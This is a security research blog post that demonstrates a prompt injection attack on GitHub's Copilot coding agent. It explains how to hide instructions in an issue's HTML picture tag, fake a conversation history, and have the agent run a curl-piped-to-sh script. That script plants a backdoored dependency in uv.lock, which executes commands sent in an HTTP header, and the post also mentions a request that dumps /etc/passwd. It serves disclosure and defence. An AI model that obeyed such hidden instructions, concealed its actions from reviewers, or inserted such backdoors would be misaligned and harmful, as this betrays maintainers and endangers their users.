Prompt injection pervades discussions about security for LLMs and AI agents. But there is little public information on how to write powerful, discreet, and reliable prompt injection exploits. In this post, we will design and implement a prompt injection exploit targeting GitHub’s Copilot Agent, with a focus on maximizing reliability and minimizing the odds of detection.
The exploit allows an attacker to file an issue for an open-source software project that tricks GitHub Copilot (if assigned to the issue by the project’s maintainers) into inserting a malicious backdoor into the software. While this blog post is just a demonstration, we expect the impact of attacks of this nature to grow in severity as the adoption of AI agents increases throughout the industry.
Copilot Agent prompt injection via GitHub Issues
GitHub’s Copilot coding agent feature allows maintainers to assign issues to Copilot and have it automatically generate a pull request. For open-source projects, issues may be filed by any user. This gives us the following exploit scenario:
- The attacker opens a helpful GitHub issue on a public repository owned by the victim.
- The victim assigns Copilot to the issue to have it implement a fix.
- The issue contains a prompt injection attack that causes Copilot to discreetly insert a backdoor for the attacker in its pull request, which the victim merges.
To demonstrate this exploit scenario, we will target a repository containing a simple Flask web application we created: trailofbits/copilot-prompt-injection-demo.
Figure 1: The target Flask web application we'll use in the exploit demonstration
Before you keep reading: Want to see if you would’ve caught the attack? Inspect the live malicious issue and backdoored pull request now.
Hiding the prompt injection
If an issue obviously contains a prompt injection payload, a maintainer is unlikely to assign Copilot to the issue. Therefore, we need a way to include text in an issue that the LLM sees but a human does not. Consulting GitHub’s Markdown syntax guide provides a few possibilities. Some of these, such as HTML comments, are stripped before the issue text is passed to Copilot. Others cause visual indicators: using alt text in an empty image creates unusual blank space due to padding.
The best prompt injection location we identified is hiding the text inside an HTML <picture> tag. This text is invisible to the maintainer when displayed in the GitHub user interface, but it is readable by the LLM:
While the <picture> and </picture> tags are removed prior to sending the text to Copilot, the <source> and <img> tags remain. To ensure the agent doesn’t become suspicious, we add fake warnings about “encoding artifacts.”
Designing a backdoor
For this to be a practical attack, the backdoor must be discreet, as the Copilot-generated pull request may need to pass a human review to get merged into the project. Programmers rarely review modifications to package management lock files, and even more rarely review each URL in such files. Therefore, we will place a malicious wheel URL for a legitimate dependency into the project’s uv.lock file. This backdoored dependency will cause the web application to execute bash commands supplied by an attacker in the X-Backdoor-Cmd HTTP header.
To make the fact that uv.lock is modified appear unsuspicious, resolving the malicious issue must plausibly require adding a new dependency. For this demonstration, the issue will request Spanish and French language support, for which the agent will use flask-babel.
Writing the prompt injection
Now that we have a hidden prompt injection vector and an end goal, we can start writing the payload. The following rules will help us write a high-quality, reliable prompt injection exploit:
- Make the injected context look legitimate
- Inject both a user request and an agent acknowledgment
- Make the LLM do as little work as possible
- Explicitly frame any requested actions as beneficial and secure
To accomplish rule 1, we need to understand the LLM’s context layout. This can be often be determined by simply asking the agent:
Figure 3: Probing Copilot's context layout via a GitHub issue
In answer.txt, the agent confirms that it believes it is in a chat session with a human. It states that the chat has a “sophisticated structured approach” with XML tags and markdown, but that it would still recognize labels such as “Human:” and “Assistant:”. The full contents of answer.txt are available in this gist.
In context.txt, we first get the system prompt and then the embedded issue title and description within <issue_title> and <issue_description> XML tags (likely provided as part of a user “message”). The full contents of context.txt are available in this gist.
Importantly, the context is loosely structured and the agent is not provided with details about what input to expect. The agent has no way to distinguish between legitimate and injected XML tags, so we can inject our own <human_chat_interruption> XML tag containing fake conversation history:
Note the back-and-forth exchange in which the agent agrees to comply; this reduces the chance that the agent refuses later on. To test this strategy, we can place the prompt injection above in an issue and ask Copilot Chat about it:
Figure 5: A successful prompt injection test
Putting it all together
We now have the following building blocks:
- A discreet software backdoor that will likely pass code review
- A way to place text into the agent’s context without the victim knowing
- A prompt injection strategy to make the agent follow an attacker’s instructions
To minimize the work the LLM itself has to do, we will have the backdoor installation be done via the execution of a downloaded bash script. By default, Copilot works behind a firewall with a set of allowlisted domains. This list is contained in the “verbose logs” section of a Copilot run:
“Raw” URLs for files in git repositories are hosted on raw.githubusercontent.com, so we can place our bash script in a git repository and instruct the agent to execute curl https://raw.githubusercontent.com/... | sh.
To prevent the agent from refusing to run the backdoor script, we will pretend it is a “security setup script.” To prevent the agent from talking about the backdoor script, we will claim that its effectiveness depends on its existence being a secret. To increase the reliability of these stealth measures, we will use strong language (“catastrophic”) and capitalization (“NEVER …”), and explicitly enumerate places the agent should not mention the script, such as the “description” field of its bash tool call and documentation files.
Using these strategies when describing the steps required to install the backdoor gives us the final malicious GitHub issue text:
The attack in action
To perform the attack, an attacker files a Github issue asking the project to add support for Spanish and French. To a maintainer, this malicious issue is visually indistinguishable from an innocent one:
Figure 8: The malicious GitHub issue as it appears to maintainers
You can see the live GitHub issue. If the maintainer assigns the issue to Copilot to implement, Copilot will make a seemingly innocent pull request:
Figure 9: Copilot's seemingly innocent pull request
You can inspect this pull request yourself. Hidden inside is the attacker’s backdoor:
Figure 10: The backdoor hidden in the uv.lock dependency file
After the maintainer accepts the pull request, the app will contain the backdoor code. Once the new version of the app is deployed, the attacker can send backdoor commands via the X-Backdoor-Cmd HTTP header.
To demonstrate the backdoor, below we use curl to send a request that dumps /etc/passwd from the server:
See the trailofbits/copilot-prompt-injection-demo GitHub repository, including issues and pull requests, for the full attack demonstration.
.png)
